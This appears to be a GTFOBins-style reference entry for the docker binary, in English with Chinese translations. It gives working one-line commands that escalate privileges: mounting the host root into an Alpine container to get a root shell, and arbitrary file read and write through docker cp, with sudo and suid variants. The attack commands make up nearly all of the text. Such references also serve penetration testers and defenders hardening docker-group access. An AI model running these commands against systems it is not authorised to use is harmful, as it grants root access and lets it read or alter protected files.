.. / docker

This requires the user to be privileged enough to run docker, i.e. being in the docker group or being root. Any other Docker Linux image should work, e.g., debian.

shell

用来生成一个交互式的系统shell。

The resulting is a root shell.

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

file-write

将数据写入文件中。

Write a file by copying it to a temporary container and back to the target destination on the host.

CONTAINER_ID="$(docker run -d alpine)" # or existing
TF=$(mktemp)
echo "DATA" > $TF
docker cp $TF $CONTAINER_ID:$TF
docker cp $CONTAINER_ID:$TF 要写入的文件

file-read

从文件中读取数据。

Read a file by copying it to a temporary container and back to a new location on the host.

CONTAINER_ID="$(docker run -d alpine)"  # or existing
TF=$(mktemp)
docker cp 要读取的文件路径 $CONTAINER_ID:$TF
docker cp $CONTAINER_ID:$TF $TF
cat $TF

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

The resulting is a root shell.

sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh

suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

The resulting is a root shell.

./docker run -v /:/mnt --rm -it alpine chroot /mnt sh